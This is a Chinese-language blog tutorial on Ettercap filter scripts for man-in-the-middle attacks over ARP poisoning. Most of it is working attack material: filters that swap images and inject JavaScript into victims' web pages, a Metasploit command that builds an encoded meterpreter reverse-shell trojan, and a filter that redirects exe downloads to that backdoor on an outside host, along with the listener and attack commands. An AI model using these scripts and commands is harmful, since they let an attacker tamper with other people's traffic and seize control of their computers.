Ettercap过滤脚本Filters功能教程

ettercap还有很强大的过滤脚本功能,通过使用过滤脚本,可以对截获到的数据包做修改然后转发给被攻击的主机。可以实现替换网页内容、替换下载内容、替换图片、在被入侵者访问的网页中插入代码......等功能。

 

1、我们就来新建一个过滤脚本,并使用它;

[email protected]:~# vim /root/img.filter

 

2、在新建立的这个文本中输入以下内容:

#图片替换
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("img src=", "img src=http://n1.itc.cn/img8/wb/smccloud/recom/2015/06/05/143348772068593938.JPEG ");
replace("IMG SRC=", "img src=http://n1.itc.cn/img8/wb/smccloud/recom/2015/06/05/143348772068593938.JPEG ");
msg("过滤执行.\n");
}

 

3、编译脚本;

要使用这个脚本,还需要使用ettercap自带的编译工具把这个脚本编译成ettercap可以识别的二进制文件。使用如下命令编译:

[email protected]:~# etterfilter /root/img.filter -o img.etter.filter

 

4、开始Filters攻击;

img.etter.filter就是已经编译完成的过滤脚本,然后可以利用过滤脚本发动攻击了。具体命令如下:

[email protected]:~# ettercap -T -q -i eth0 -F /root/img.etter.filter -M arp:remote /192.168.1.104//  /192.168.1.1//

Ettercap Filters

或者

可以直接去Ettercap图形界面操作,如下所示:不过我在图形界面操作没有成功。Ettercap图形界面

 

5、现在只要是192.168.1.104这台电脑去访问任何http协议的网站,图片都会被替换成功;有时候,有些图片也替换不了,因为有些图片是在js或css样式里面的。

 

注意:

上面的代码还可以换成其它的,例如:

#弹窗
if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Rubbish!");
# note: replacement string is same length as original string
#msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("<head>", "<head><script type="text/javascript">alert('rootoorotor was here');</script>");
replace("<HEAD>", "<HEAD><script type="text/javascript">alert('rootoorotor was here');</script>");
msg("注入成功!!\n");
}</span>

 

Ettercap过滤脚本Filters拓展示例

下面是一个使用过滤脚本替换网页下载文件并夺取目标主机控制权的列子,这里结合Metasploit生成一个反向链接的payload做演示;

 

1、生成exe木马;

[email protected]:~# msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 R | msfencode -e x86/shikata_ga_nai -c 3 -t exe -o setup.exe

 

2、创建一个代码文件,如下:

生成后门之后可以把后门程序放在网盘上,然后在下面用到的脚本中把下载地址替换为你放置后门的地点,然后新建一个替换下载内容的过滤脚本,保存为exe.filter:

if (ip.proto == TCP && tcp.dst == 80) {
if (search(DATA.data, "Accept-Encoding")) {
replace("Accept-Encoding", "Accept-Mousecat");
msg("zapped Accept-Encoding!\n");
}
}
if (ip.proto == TCP && tcp.src == 80) {
replace("keep-alive", "close" ");
replace("Keep-Alive", "close" ");
}
if (ip.proto == TCP && search(DATA.data, ": application") ){
msg("found EXE\n");
if (search(DATA.data, "Win32")) {
msg("doing nothing\n");
} else {
replace("200 OK", "301 Moved Permanently Location: http://www.rootoorotor.org/setup.exe");
msg("redirect success\n");
}
}

 

3、编译脚本;

[email protected]:~# etterfilter exe.filter -o exe.ef

 

4、handler监听本地端口;

使用msfcli的handler监听本地的4444端口

[email protected]:~# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 E

注意:msfcli现在命令不能用了,请自行转换,用过msf的都能清楚这句语句的意思。

 

5、ettercap攻击开始;

使用ettercap调用过滤脚本发动ARP攻击毒化目标主机的ARP缓存

[email protected]:~# ettercap -Tq -i eth0 -F /root/exe.ef -M arp:remote /192.168.1.104// /192.168.1.1//

 

6、当发动ARP攻击成功之后,被攻击主机从网站下载后缀名为exe的文件会被替换成后门程序的下载地址。如图:ettercap arp

 

7、被入侵者如果在不知明的情况下运行了setup.exe。入侵者就得到了被攻击主机(192.168.1.104)的控制权。

 

事实上不会这么简单就夺取一台主机的控制权,在操作的时候发现替换exe程序的脚本经常失效,这里只是做个简单的演示,重要的是知道原理。

    A+
发布日期:2019年08月25日 20:09:48  所属分类:渗透测试
最后更新时间:2019-08-25 20:11:43
评分: (1 票;平均数5.00 ;最高评分 5 ;用户总数1;总得分 5;百分比100.00)
付杰
PHP运行环境 wamp lamp lnmp 安装 配置 搭建
PHP运行环境 wamp lamp lnmp 安装 配置 搭建
  • ¥ 9.9元
  • 市场价:49.9元
wordpress站群服务 泛解析二级域名 二级目录站群
wordpress站群服务 泛解析二级域名 二级目录站群
  • ¥ 1999.9元
  • 市场价:4800元
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
花牛苹果 甘肃天水 李宏恩家自种 1斤 包邮
  • ¥ 6.8元
  • 市场价:8.8元
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
免费SSL证书 HTTPS申请 安装 配置 支持通配符*
  • ¥ 199.9元
  • 市场价:20000元

发表评论

:?: :razz: :sad: :evil: :!: :smile: :oops: :grin: :eek: :shock: :???: :cool: :lol: :mad: :twisted: :roll: :wink: :idea: :arrow: :neutral: :cry: :mrgreen: